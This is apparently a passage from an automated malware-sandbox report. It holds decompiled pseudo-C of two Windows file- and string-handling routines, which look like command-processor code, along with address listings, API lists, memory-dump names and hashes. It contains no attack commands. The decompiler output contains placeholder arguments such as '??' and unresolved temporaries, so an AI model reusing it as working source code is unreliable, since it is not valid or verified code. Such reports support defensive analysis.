                                                    0x011f8536
                                                    0x011f8536
                                                    0x011f853e
                                                    0x011f8548
                                                    0x011f8548
                                                    0x011f85e6

                                                    APIs
                                                    • _get_osfhandle.MSVCRT ref: 011F850D
                                                    • FlushFileBuffers.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011F8CE3,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 011F8515
                                                      • Part of subcall function 011DDB92: _close.MSVCRT ref: 011DDBC1
                                                    • _get_osfhandle.MSVCRT ref: 011F855B
                                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 011F8563
                                                    • _get_osfhandle.MSVCRT ref: 011F8575
                                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,?,?,00000000,00000000), ref: 011F857D
                                                    • memcmp.MSVCRT ref: 011F859F
                                                    • _get_osfhandle.MSVCRT ref: 011F85D0
                                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 011F85D8
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: File_get_osfhandle$Pointer$BuffersFlushRead_closememcmp
                                                    • String ID:
                                                    • API String ID: 332413853-0
                                                    • Opcode ID: a50de4650c369f47b70831d865aa193a37e52136944a00e5d510f2459573d465
                                                    • Instruction ID: 4d4b5de74498c1a2dc1286201c72742d6594ea340d43259d74b5be6da6e05bb6
                                                    • Opcode Fuzzy Hash: a50de4650c369f47b70831d865aa193a37e52136944a00e5d510f2459573d465
                                                    • Instruction Fuzzy Hash: 5D21D231A00115ABDF2C9FA9AC4DE7B3BAAEF95364F004619F515C61D4DF714C40C761
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011D81E0, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 253COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 74%
                                                    			E011D81E0(intOrPtr _a4, long _a8, signed int* _a16) {
				signed int _v8;
				void* _v12;
				int _v20;
				char _v24;
				int _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void _v548;
				void* _v552;
				long _v556;
				char _v560;
				int _v564;
				void* _v568;
				void* _v572;
				void* _v580;
				void _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				long _v1104;
				void* _v1108;
				void* _v1112;
				void* _v1120;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t93;
				long _t95;
				signed int _t97;
				signed int _t111;
				WCHAR* _t117;
				void* _t119;
				signed int _t120;
				WCHAR* _t122;
				int _t123;
				signed char* _t126;
				WCHAR* _t127;
				WCHAR* _t129;
				signed int _t134;
				WCHAR* _t135;
				void* _t136;
				char _t140;
				void* _t141;
				signed int* _t142;
				signed int _t153;
				signed int _t164;
				intOrPtr _t167;
				void* _t168;
				long _t169;
				WCHAR* _t170;
				char _t172;
				void* _t173;
				signed int _t174;
				signed int _t176;
				signed int _t178;

				_t176 = (_t174 & 0xfffffff8) - 0x44c;
				_t93 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t93 ^ _t176;
				_t95 = _a8;
				_t142 = _a16;
				_v1104 = _t95;
				_v1096 =  *(_t95 + 2) & 0x0000ffff;
				_t140 = 1;
				_t97 =  *_t142;
				_v1088 = _t142;
				_v560 = 1;
				_t167 = _a4;
				_t172 = 0;
				_v1100 = _t97 & 0x00002000;
				_v1092 = _t97 & 0x00000800;
				_v556 = 0x104;
				_v564 = 0;
				memset( &_v1084, 0, 0x104);
				_v28 = 0;
				_v24 = 1;
				_v20 = 0x104;
				memset( &_v548, 0, 0x104);
				_t178 = _t176 + 0x18;
				if(E011E0C70( &_v1084, 0x7fe9) < 0 || E011E0C70( &_v548, 0x7fe9) < 0) {
					L23:
					_t172 = _t140;
					goto L24;
				} else {
					if(_v1100 != 0 || _v1092 != 0 ||  *((char*)(_t167 + 0x11)) != 0) {
						L6:
						_t161 = _v1104;
						if(( *(_t161 + 4) & 0x00000010) != 0) {
							L24:
							_t140 = _t172;
							L25:
							_t172 = _t140;
							L26:
							_t140 = _t172;
							L27:
							_t172 = _t140;
							L17:
							__imp__??_V@YAXPAX@Z(_v28);
							__imp__??_V@YAXPAX@Z(_v564);
							_pop(_t168);
							_pop(_t173);
							_pop(_t141);
							return E011E6FD0(_t172, _t141, _v8 ^ _t178, _t161, _t168, _t173);
						}
						_t151 = _v564;
						if(_v564 == 0) {
							_t151 =  &_v1084;
						}
						_t111 = _t161 + 0x30 + (_v1096 & 0x0000ffff) * 2;
						_t161 = _v556;
						_v1096 = _t111;
						if(E011E51C9(_t151, _v556,  *((intOrPtr*)(_t167 + 4)), _t111) != 0) {
							_push(_v1096);
							E011DC5A2(_t151, 0x400023da, 2,  *((intOrPtr*)(_t167 + 4)));
							_t178 = _t178 + 0x10;
							goto L25;
						} else {
							_t152 = _v28;
							if(_v28 == 0) {
								_t152 =  &_v548;
							}
							_t163 = _v20;
							if(E011E51C9(_t152, _v20,  *((intOrPtr*)(_t167 + 4)), _v1104 + 0x30) != 0) {
								_t117 = _v564;
								__eflags = _t117;
								if(_t117 == 0) {
									_t117 =  &_v1084;
								}
								_t153 =  &_v548;
								E011E0D89(_t163, _t117);
							}
							if(_v1092 != _t172) {
								_t153 = _v28;
								__eflags = _t153;
								if(_t153 == 0) {
									_t153 =  &_v548;
								}
								_t161 = 0x232c;
								_t119 = E011F9583(_t153, 0x232c, 0x2328);
								__eflags = _t119 - _t140;
								if(_t119 == _t140) {
									goto L12;
								} else {
									__eflags =  *0x11fd544 - _t172; // 0x0
									if(__eflags == 0) {
										goto L26;
									}
									goto L25;
								}
							} else {
								L12:
								_t120 = _v1088;
								_t169 = _v1104;
								_t164 =  *(_t169 + 4);
								_t154 = _t153 & 0xffffff00 | ( *_t120 & 0x00001000) != 0x00000000;
								if(((_t120 & 0xffffff00 | (_t164 & 0x00000001) != 0x00000000) & (_t153 & 0xffffff00 | ( *_t120 & 0x00001000) != 0x00000000)) != 0) {
									_t122 = _v564;
									__eflags = _t122;
									if(_t122 == 0) {
										_t122 =  &_v1084;
									}
									_t161 = _t164 & 0xfffffffe;
									_t123 = SetFileAttributesW(_t122, _t164 & 0xfffffffe);
									__eflags = _t123;
									if(_t123 != 0) {
										goto L13;
									} else {
										_push(_t172);
										_push(GetLastError());
										E011DC5A2(_t154);
										goto L27;
									}
								}
								L13:
								_t155 = _v28;
								if(_v28 == 0) {
									_t155 =  &_v548;
								}
								_t161 =  *(_t169 + 4);
								if(E011D83F2(_t155,  *(_t169 + 4)) != 0) {
									_t155 = _v564;
									__eflags = _v564;
									if(_v564 == 0) {
										_t155 =  &_v1084;
									}
									_t161 =  *(_t169 + 4);
									_t170 = E011D83F2(_t155,  *(_t169 + 4));
									__eflags = _t170;
									if(_t170 == 0) {
										goto L15;
									} else {
										__eflags = _t170 - 0x4d3;
										if(_t170 == 0x4d3) {
											goto L27;
										}
										_t129 = _v28;
										__eflags = _t129;
										if(_t129 == 0) {
											_t129 =  &_v548;
										}
										E011E25D9(L"%s\r\n");
										E011DC5A2(_t155, _t170, _t172, _t129);
										_t178 = _t178 + 0x10;
										goto L17;
									}
								} else {
									L15:
									_t126 = _v1088;
									_t126[0x60] = _t126[0x60] + 1;
									if( *0x1213cc9 != 0 && ( *_t126 & 0x00000010) != 0) {
										_t127 = _v28;
										__eflags = _t127;
										if(_t127 == 0) {
											_t127 =  &_v548;
										}
										E011DC108(_t155, 0x400023a1, _t140, _t127);
										_t178 = _t178 + 0xc;
									}
									goto L17;
								}
							}
						}
					} else {
						_t134 = E011D8512( *((intOrPtr*)(_t167 + 8)),  *((intOrPtr*)(_t167 + 0xc)));
						_v1100 = _t134;
						if(_t134 != 0) {
							_t159 = _v564;
							__eflags = _v564;
							if(_v564 == 0) {
								_t159 =  &_v1084;
							}
							_t161 = _v556;
							_t135 = E011E51C9(_t159, _v556,  *((intOrPtr*)(_t167 + 4)), _t134);
							__eflags = _t135;
							if(_t135 == 0) {
								_t160 = _v564;
								 *((char*)(_t167 + 0x11)) = _t140;
								__eflags = _v564;
								if(_v564 == 0) {
									_t160 =  &_v1084;
								}
								_t161 = 0x234e;
								_t136 = E011F9583(_t160, 0x234e, 0x2328);
								__eflags = _t136 - _t140;
								if(_t136 != _t140) {
									goto L23;
								} else {
									goto L6;
								}
							} else {
								_push(_v1100);
								E011DC5A2(_t159, 0x400023da, 2,  *((intOrPtr*)(_t167 + 4)));
								_t178 = _t178 + 0x10;
								goto L23;
							}
						}
						goto L6;
					}
				}
			}





























































                                                    0x011d81e8
                                                    0x011d81ee
                                                    0x011d81f5
                                                    0x011d81fc
                                                    0x011d81ff
                                                    0x011d8202
                                                    0x011d820c
                                                    0x011d8210
                                                    0x011d8211
                                                    0x011d8213
                                                    0x011d821f
                                                    0x011d8227
                                                    0x011d822a
                                                    0x011d822c
                                                    0x011d823b
                                                    0x011d8240
                                                    0x011d824d
                                                    0x011d8254
                                                    0x011d825c
                                                    0x011d8268
                                                    0x011d826f
                                                    0x011d8280
                                                    0x011d8285
                                                    0x011d8298
                                                    0x011f01dd
                                                    0x011f01dd
                                                    0x00000000
                                                    0x011d82b7
                                                    0x011d82bb
                                                    0x011d82e0
                                                    0x011d82e0
                                                    0x011d82e8
                                                    0x011f01df
                                                    0x011f01df
                                                    0x011f01e1
                                                    0x011f01e1
                                                    0x011f01e3
                                                    0x011f01e3
                                                    0x011f01e5
                                                    0x011f01e5
                                                    0x011d83b4
                                                    0x011d83bb
                                                    0x011d83c9
                                                    0x011d83d9
                                                    0x011d83da
                                                    0x011d83db
                                                    0x011d83e6
                                                    0x011d83e6
                                                    0x011d82ee
                                                    0x011d82f7
                                                    0x011f0216
                                                    0x011f0216
                                                    0x011d8307
                                                    0x011d830a
                                                    0x011d8315
                                                    0x011d8320
                                                    0x011f021f
                                                    0x011f022d
                                                    0x011f0232
                                                    0x00000000
                                                    0x011d8326
                                                    0x011d8326
                                                    0x011d832f
                                                    0x011f0237
                                                    0x011f0237
                                                    0x011d8339
                                                    0x011d834e
                                                    0x011f0243
                                                    0x011f024a
                                                    0x011f024c
                                                    0x011f024e
                                                    0x011f024e
                                                    0x011f0253
                                                    0x011f025a
                                                    0x011f025a
                                                    0x011d8358
                                                    0x011f0264
                                                    0x011f026b
                                                    0x011f026d
                                                    0x011f026f
                                                    0x011f026f
                                                    0x011f027b
                                                    0x011f0280
                                                    0x011f0285
                                                    0x011f0287
                                                    0x00000000
                                                    0x011f028d
                                                    0x011f028d
                                                    0x011f0293
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f0299
                                                    0x011d835e
                                                    0x011d835e
                                                    0x011d835e
                                                    0x011d8362
                                                    0x011d836c
                                                    0x011d836f
                                                    0x011d837a
                                                    0x011f029e
                                                    0x011f02a5
                                                    0x011f02a7
                                                    0x011f02a9
                                                    0x011f02a9
                                                    0x011f02ad
                                                    0x011f02b2
                                                    0x011f02b8
                                                    0x011f02ba
                                                    0x00000000
                                                    0x011f02c0
                                                    0x011f02c0
                                                    0x011f02c7
                                                    0x011f02c8
                                                    0x00000000
                                                    0x011f02ce
                                                    0x011f02ba
                                                    0x011d8380
                                                    0x011d8380
                                                    0x011d8389
                                                    0x011d83e9
                                                    0x011d83e9
                                                    0x011d838b
                                                    0x011d8395
                                                    0x011f02d4
                                                    0x011f02db
                                                    0x011f02dd
                                                    0x011f02df
                                                    0x011f02df
                                                    0x011f02e3
                                                    0x011f02eb
                                                    0x011f02ed
                                                    0x011f02ef
                                                    0x00000000
                                                    0x011f02f5
                                                    0x011f02f5
                                                    0x011f02fb
                                                    0x00000000
                                                    0x00000000
                                                    0x011f0301
                                                    0x011f0308
                                                    0x011f030a
                                                    0x011f030c
                                                    0x011f030c
                                                    0x011f0319
                                                    0x011f0320
                                                    0x011f0325
                                                    0x00000000
                                                    0x011f0325
                                                    0x011d839b
                                                    0x011d839b
                                                    0x011d839b
                                                    0x011d839f
                                                    0x011d83a9
                                                    0x011f032d
                                                    0x011f0334
                                                    0x011f0336
                                                    0x011f0338
                                                    0x011f0338
                                                    0x011f0346
                                                    0x011f034b
                                                    0x011f034b
                                                    0x00000000
                                                    0x011d83a9
                                                    0x011d8395
                                                    0x011d8358
                                                    0x011d82c9
                                                    0x011d82cf
                                                    0x011d82d4
                                                    0x011d82da
                                                    0x011f01a4
                                                    0x011f01ab
                                                    0x011f01ad
                                                    0x011f01af
                                                    0x011f01af
                                                    0x011f01b3
                                                    0x011f01be
                                                    0x011f01c3
                                                    0x011f01c5
                                                    0x011f01ec
                                                    0x011f01f3
                                                    0x011f01f6
                                                    0x011f01f8
                                                    0x011f01fa
                                                    0x011f01fa
                                                    0x011f0203
                                                    0x011f0208
                                                    0x011f020d
                                                    0x011f020f
                                                    0x00000000
                                                    0x011f0211
                                                    0x00000000
                                                    0x011f0211
                                                    0x011f01c7
                                                    0x011f01c7
                                                    0x011f01d5
                                                    0x011f01da
                                                    0x00000000
                                                    0x011f01da
                                                    0x011f01c5
                                                    0x00000000
                                                    0x011d82da
                                                    0x011d82bb

                                                    APIs
                                                    • memset.MSVCRT ref: 011D8254
                                                    • memset.MSVCRT ref: 011D8280
                                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011D83BB
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011D83C9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: memset
                                                    • String ID: %s
                                                    • API String ID: 2221118986-3043279178
                                                    • Opcode ID: b29e2c05960ec1431416e3afc94a7de5d6c8c4c1a057eba34597a5caa911ab17
                                                    • Instruction ID: 7cca5aba5fa2d5464b9d8b81d44404aa2f8a26b34c34bb3d234dcb151feb8e8c
                                                    • Opcode Fuzzy Hash: b29e2c05960ec1431416e3afc94a7de5d6c8c4c1a057eba34597a5caa911ab17
                                                    • Instruction Fuzzy Hash: 3591A2712083429BD73DDF58C894BAFB7E5BF98204F04491DFA8987251DB34E944C792
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011D8F70, Relevance: 12.4, APIs: 8, Instructions: 447COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 49%
                                                    			E011D8F70(signed int __ecx, wchar_t* __edx, void* __eflags, signed int* _a4, intOrPtr _a8) {
				void* _v8;
				signed int _v12;
				char _v20;
				wchar_t* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				signed int _v48;
				wchar_t* _v52;
				signed int _v56;
				int _v60;
				wchar_t* _v64;
				intOrPtr _v68;
				signed int _v72;
				int _v76;
				signed short* _v80;
				void* _v84;
				signed short* _v88;
				signed short* _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				signed short* _v104;
				void* __edi;
				void* __ebp;
				signed int _t127;
				int _t130;
				signed int* _t131;
				intOrPtr* _t135;
				signed int _t139;
				intOrPtr _t142;
				intOrPtr _t143;
				short* _t144;
				intOrPtr _t145;
				intOrPtr _t146;
				signed short* _t149;
				wchar_t* _t150;
				intOrPtr _t152;
				intOrPtr _t153;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t156;
				intOrPtr _t157;
				signed int _t158;
				signed short* _t162;
				void _t163;
				signed int _t165;
				intOrPtr _t167;
				signed int _t171;
				signed int _t173;
				signed short* _t175;
				intOrPtr* _t176;
				signed int _t178;
				signed int _t179;
				signed int _t180;
				intOrPtr _t181;
				signed short* _t190;
				wchar_t* _t191;
				intOrPtr* _t192;
				intOrPtr* _t195;
				signed int _t197;
				void* _t198;
				void* _t199;
				intOrPtr* _t203;
				intOrPtr* _t206;
				intOrPtr* _t209;
				void* _t212;
				intOrPtr* _t213;
				signed int _t219;
				signed short* _t220;
				signed short* _t226;
				signed short* _t228;
				wchar_t* _t229;
				short* _t230;
				void* _t231;
				void* _t232;
				intOrPtr* _t233;
				signed short* _t237;
				void* _t240;
				void* _t241;
				void* _t242;
				void* _t243;
				signed short* _t244;
				signed short* _t247;
				wchar_t* _t252;
				WCHAR* _t254;
				void* _t255;
				signed int _t256;
				intOrPtr* _t258;
				signed int _t260;
				void* _t262;
				intOrPtr* _t265;
				signed int _t267;
				signed int _t268;
				intOrPtr* _t269;
				signed short* _t270;
				signed short* _t271;
				signed short* _t272;
				signed short* _t273;
				intOrPtr _t276;
				signed int _t277;
				void* _t278;
				void* _t279;
				void* _t282;

				_t229 = __edx;
				_push(0xfffffffe);
				_push(0x11fbe58);
				_push(E011E7290);
				_push( *[fs:0x0]);
				_t279 = _t278 - 0x54;
				_t127 =  *0x11fd0b4; // 0x1805bc26
				_v12 = _v12 ^ _t127;
				_push(_t127 ^ _t277);
				 *[fs:0x0] =  &_v20;
				_v52 = __edx;
				_v56 = __ecx;
				_v60 = 0;
				_t252 = 0;
				_v40 = 0;
				_t262 = 0;
				_v36 = 0;
				_v8 = 0;
				_t130 = E011E00B0(0x4000);
				_v60 = _t130;
				if(_t130 == 0) {
					_t171 = _v56;
					if(_t171 == 0) {
						L74:
						_t131 = _a4;
						L75:
						 *_t131 = 0;
						L23:
						_v8 = 0xfffffffe;
						E011D93F4(_t252);
						 *[fs:0x0] = _v20;
						return _t262;
					}
					__imp__longjmp(_t171, 0xffffffff);
					L91:
					_t173 = _v56;
					if(_t173 == 0) {
						L73:
						_t262 = _v36;
						goto L74;
					}
					__imp__longjmp(_t173, 0xffffffff);
					L93:
					_t230 = _t229 - 2;
					_v64 = _t230;
					_v68 = _t173 - 1;
					L20:
					 *_t230 = 0;
					_t175 = _v52;
					_t254 = _v40;
					L21:
					_t135 = _v32;
					_v32 = _t135 + 2;
					_t255 = E011DCFBC(_t254);
					_v44 = _t255;
					if( *_t135 == 0x3a) {
						if( *0x1213cc9 == 0 || _t255 == 0) {
							goto L22;
						} else {
							_t190 = _v32;
							_t139 =  *_t190 & 0x0000ffff;
							if(_t139 == 0x7e) {
								_t191 =  &(_t190[1]);
								_v32 = _t191;
								_t256 = wcstol(_t191,  &_v32, 0);
								_v72 = _t256;
								_t176 = _v44;
								if(_t256 >= 0) {
									L50:
									_t192 = _t176;
									_t66 = _t192 + 2; // 0x11e7292
									_t231 = _t66;
									do {
										_t142 =  *_t192;
										_t192 = _t192 + 2;
									} while (_t142 != 0);
									if(_t256 >= _t192 - _t231 >> 1) {
										_t195 = _t176;
										_t109 = _t195 + 2; // 0x11e7292
										_t232 = _t109;
										do {
											_t143 =  *_t195;
											_t195 = _t195 + 2;
										} while (_t143 != 0);
										_t197 = _t195 - _t232 >> 1;
										L54:
										if(_t197 < 0) {
											_t256 = 0;
											L58:
											_v72 = _t256;
											_t144 = _v32;
											if( *_t144 != 0x2c) {
												_t257 = _t176 + _t256 * 2;
												_t265 = _t176 + _t256 * 2;
												_t104 = _t265 + 2; // 0x2
												_t198 = _t104;
												do {
													_t145 =  *_t265;
													_t265 = _t265 + 2;
												} while (_t145 != 0);
												L72:
												_t267 = _t265 - _t198 >> 1;
												L63:
												_v48 = _t267;
												_t233 = _t176;
												_t78 = _t233 + 2; // 0x11e7292
												_t199 = _t78;
												do {
													_t146 =  *_t233;
													_t233 = _t233 + 2;
												} while (_t146 != 0);
												_t255 = _v44;
												E011E6826(_t255, (_t233 - _t199 >> 1) + 1, _t257, _t267);
												if( *((short*)(_t255 + _t267 * 2)) != 0) {
													 *((short*)(_t255 + _t267 * 2)) = 0;
												}
												_t149 = _v32;
												_t237 =  &(_t149[1]);
												_v32 = _t237;
												_t131 = _a4;
												if(( *_t149 & 0x0000ffff) != _a8) {
													L98:
													_t262 = _v36;
													_t252 = _v40;
													goto L75;
												} else {
													 *_t131 = _t237 - _v52 >> 1;
													L45:
													_t262 = _t255;
													_v36 = _t262;
													_t252 = _v40;
													goto L23;
												}
											}
											_t150 = _t144 + 2;
											_v32 = _t150;
											_t268 = wcstol(_t150,  &_v32, 0);
											_v48 = _t268;
											if(_t268 < 0) {
												_t203 = _t176 + _t256 * 2;
												_t240 = _t203 + 2;
												do {
													_t152 =  *_t203;
													_t203 = _t203 + 2;
												} while (_t152 != 0);
												_t267 = _t268 + (_t203 - _t240 >> 1);
												_v48 = _t267;
												if(_t267 < 0) {
													_t267 = 0;
												}
											}
											_v48 = _t267;
											_t257 = _t176 + _t256 * 2;
											_t206 = _t257;
											_t76 = _t206 + 2; // 0x2
											_t241 = _t76;
											do {
												_t153 =  *_t206;
												_t206 = _t206 + 2;
											} while (_t153 != 0);
											if(_t267 >= _t206 - _t241 >> 1) {
												_t269 = _t257;
												_t99 = _t269 + 2; // 0x2
												_t198 = _t99;
												do {
													_t154 =  *_t269;
													_t269 = _t269 + 2;
												} while (_t154 != 0);
												goto L72;
											}
											goto L63;
										}
										_t209 = _t176;
										_t67 = _t209 + 2; // 0x11e7292
										_t242 = _t67;
										do {
											_t155 =  *_t209;
											_t209 = _t209 + 2;
										} while (_t155 != 0);
										if(_t256 >= _t209 - _t242 >> 1) {
											_t258 = _t176;
											_t110 = _t258 + 2; // 0x11e7292
											_t212 = _t110;
											do {
												_t156 =  *_t258;
												_t258 = _t258 + 2;
											} while (_t156 != 0);
											_t256 = _t258 - _t212 >> 1;
										}
										goto L58;
									}
									_t197 = _t256;
									goto L54;
								}
								_t213 = _t176;
								_t64 = _t213 + 2; // 0x11e7292
								_t243 = _t64;
								do {
									_t157 =  *_t213;
									_t213 = _t213 + 2;
								} while (_t157 != 0);
								_t256 = _t256 + (_t213 - _t243 >> 1);
								_v72 = _t256;
								goto L50;
							}
							if(_t139 == 0x2a) {
								_t190 =  &(_t190[1]);
								_v32 = _t190;
								_v76 = 1;
							} else {
								_v76 = 0;
							}
							_t270 = _t190;
							_v104 = _t270;
							_t244 = _t270;
							while(1) {
								_t158 =  *_t190 & 0x0000ffff;
								if(_t158 == 0 || _t158 == 0x3d) {
									break;
								}
								_t190 =  &(_t244[1]);
								_v32 = _t190;
								_t244 = _t190;
							}
							if( *_t190 == 0) {
								L100:
								_t252 = _v40;
								goto L73;
							}
							_t178 = _t244 - _t270;
							_t179 = _t178 >> 1;
							if(_t178 == 0) {
								_t180 = _v56;
								if(_t180 == 0) {
									goto L100;
								}
								E011DC5A2(_t190, 0x234a, 1, _t244);
								_t282 = _t279 + 0xc;
								__imp__longjmp(_t180, 0xffffffff);
								L103:
								_t255 = _v44;
								memcpy(_t255, ??, ??);
								E011E1040(_v56 + _v56 + _t255, 0x2000 - _v56, _t270);
								goto L45;
							}
							_t162 =  &(_t244[1]);
							_t271 = _t162;
							_v80 = _t271;
							while(1) {
								_t247 = _t162;
								_v32 = _t162;
								_t219 =  *_t162 & 0x0000ffff;
								if(_t219 == 0 || _t219 == _a8) {
									break;
								}
								_t162 =  &(_t247[1]);
							}
							_t131 = _a4;
							if( *_t162 == 0) {
								goto L98;
							}
							_t220 =  &(_t247[1]);
							_v32 = _t220;
							_v56 = _t247 - _t271 >> 1;
							 *_t131 = _t220 - _v52 >> 1;
							if( *_t255 == 0) {
								goto L45;
							}
							_t272 = _v60;
							_t163 = E011E1040(_t272, 0x2000, _t255);
							_v88 = _t272;
							_v84 = _t255;
							while(1) {
								L42:
								__imp___wcsnicmp(_t272, _v104, _t179);
								_t282 = _t279 + 0xc;
								if(_t163 != 0) {
									break;
								}
								_t270 =  &(_t272[_t179]);
								_push(_v56 + _v56);
								_push(_v80);
								if(_v76 != 0) {
									goto L103;
								}
								_t163 = memcpy(_t255, ??, ??);
								_t279 = _t282 + 0xc;
								_t255 = _t255 + _v56 * 2;
								_v84 = _t255;
								_v88 = _t270;
							}
							_t163 =  *_t272 & 0x0000ffff;
							 *_t255 = _t163;
							_t255 = _t255 + 2;
							_v84 = _t255;
							_t272 =  &(_t272[1]);
							_v88 = _t272;
							if(_t163 != 0) {
								goto L42;
							}
							_t255 = _v44;
							goto L45;
						}
					}
					L22:
					 *_a4 = _v32 - _t175 >> 1;
					_t262 = _t255;
					_v36 = _t262;
					_t252 = _v40;
					goto L23;
				}
				_t226 = __edx;
				_v32 = __edx;
				_t273 = __edx;
				_t229 =  *0x1213cc9;
				while(1) {
					_t165 =  *_t226 & 0x0000ffff;
					if(_t165 == 0) {
						break;
					}
					_t181 = _a8;
					if(_t165 == _t181 || _t229 != 0 && _t165 == 0x3a && _t226[1] != _t181) {
						break;
					} else {
						_t13 =  &(_t273[1]); // 0x2
						_t226 = _t13;
						_v32 = _t226;
						_t273 = _t226;
						continue;
					}
				}
				if( *_t226 == 0) {
					goto L73;
				}
				_t175 = _v52;
				if(_t273 == _t175) {
					goto L73;
				}
				_t276 = (_t273 - _t175 >> 1) + 1;
				_t252 = E011E00B0(_t276 + _t276);
				_v40 = _t252;
				if(_t252 == 0) {
					goto L91;
				}
				_t19 = _t276 - 1; // 0x0
				_t167 = _t19;
				if(_t276 == 0) {
					goto L21;
				}
				if(_t276 > 0x7fffffff) {
					if(_t276 == 0) {
						goto L21;
					}
					L95:
					 *_t252 = 0;
					goto L21;
				}
				if(_t167 > 0x7ffffffe) {
					goto L95;
				}
				_t228 = _t175;
				_t229 = _t252;
				_t173 = 0;
				while(1) {
					_v68 = _t173;
					_v64 = _t229;
					_v96 = _t276;
					_v92 = _t228;
					_v100 = _t167;
					if(_t276 == 0) {
						goto L93;
					}
					if(_t167 == 0) {
						L19:
						if(_t276 == 0) {
							goto L93;
						}
						goto L20;
					}
					_t260 =  *_t228 & 0x0000ffff;
					if(_t260 == 0) {
						goto L19;
					}
					 *_t229 = _t260;
					_t229 =  &(_t229[0]);
					_t228 =  &(_t228[1]);
					_t276 = _t276 - 1;
					_t167 = _t167 - 1;
					_t173 = _t173 + 1;
				}
				goto L93;
			}










































































































                                                    0x011d8f70
                                                    0x011d8f75
                                                    0x011d8f77
                                                    0x011d8f7c
                                                    0x011d8f87
                                                    0x011d8f88
                                                    0x011d8f8e
                                                    0x011d8f93
                                                    0x011d8f98
                                                    0x011d8f9c
                                                    0x011d8fa4
                                                    0x011d8fa7
                                                    0x011d8faa
                                                    0x011d8fb1
                                                    0x011d8fb3
                                                    0x011d8fb6
                                                    0x011d8fb8
                                                    0x011d8fbb
                                                    0x011d8fc3
                                                    0x011d8fc8
                                                    0x011d8fcd
                                                    0x011f08a4
                                                    0x011f08a9
                                                    0x011d9369
                                                    0x011d9369
                                                    0x011d936c
                                                    0x011d936c
                                                    0x011d90d3
                                                    0x011d90d3
                                                    0x011d90da
                                                    0x011d90e4
                                                    0x011d90f2
                                                    0x011d90f2
                                                    0x011f08b2
                                                    0x011f08b8
                                                    0x011f08b8
                                                    0x011f08bd
                                                    0x011d9366
                                                    0x011d9366
                                                    0x00000000
                                                    0x011d9366
                                                    0x011f08c6
                                                    0x011f08cc
                                                    0x011f08cc
                                                    0x011f08cf
                                                    0x011f08d3
                                                    0x011d9096
                                                    0x011d9098
                                                    0x011d909b
                                                    0x011d909e
                                                    0x011d90a1
                                                    0x011d90a1
                                                    0x011d90aa
                                                    0x011d90b4
                                                    0x011d90b6
                                                    0x011d90bd
                                                    0x011d90fc
                                                    0x00000000
                                                    0x011d9102
                                                    0x011d9102
                                                    0x011d9105
                                                    0x011d910b
                                                    0x011d91ef
                                                    0x011d91f2
                                                    0x011d9205
                                                    0x011d9207
                                                    0x011d920a
                                                    0x011d920f
                                                    0x011d922a
                                                    0x011d922a
                                                    0x011d922c
                                                    0x011d922c
                                                    0x011d9230
                                                    0x011d9230
                                                    0x011d9233
                                                    0x011d9236
                                                    0x011d9241
                                                    0x011d93b6
                                                    0x011d93b8
                                                    0x011d93b8
                                                    0x011d93c0
                                                    0x011d93c0
                                                    0x011d93c3
                                                    0x011d93c6
                                                    0x011d93cd
                                                    0x011d9249
                                                    0x011d924b
                                                    0x011f08ed
                                                    0x011d926d
                                                    0x011d926d
                                                    0x011d9270
                                                    0x011d9277
                                                    0x011d9377
                                                    0x011d937a
                                                    0x011d937c
                                                    0x011d937c
                                                    0x011d9380
                                                    0x011d9380
                                                    0x011d9383
                                                    0x011d9386
                                                    0x011d935d
                                                    0x011d935f
                                                    0x011d92c7
                                                    0x011d92c7
                                                    0x011d92ca
                                                    0x011d92cc
                                                    0x011d92cc
                                                    0x011d92d0
                                                    0x011d92d0
                                                    0x011d92d3
                                                    0x011d92d6
                                                    0x011d92e2
                                                    0x011d92e7
                                                    0x011d92f1
                                                    0x011f08f6
                                                    0x011f08f6
                                                    0x011d92f7
                                                    0x011d92fd
                                                    0x011d9300
                                                    0x011d9303
                                                    0x011d930a
                                                    0x011f08ff
                                                    0x011f08ff
                                                    0x011f0902
                                                    0x00000000
                                                    0x011d9310
                                                    0x011d9315
                                                    0x011d91e2
                                                    0x011d91e2
                                                    0x011d91e4
                                                    0x011d91e7
                                                    0x00000000
                                                    0x011d91e7
                                                    0x011d930a
                                                    0x011d927d
                                                    0x011d9280
                                                    0x011d9293
                                                    0x011d9295
                                                    0x011d929a
                                                    0x011d938d
                                                    0x011d9390
                                                    0x011d9393
                                                    0x011d9393
                                                    0x011d9396
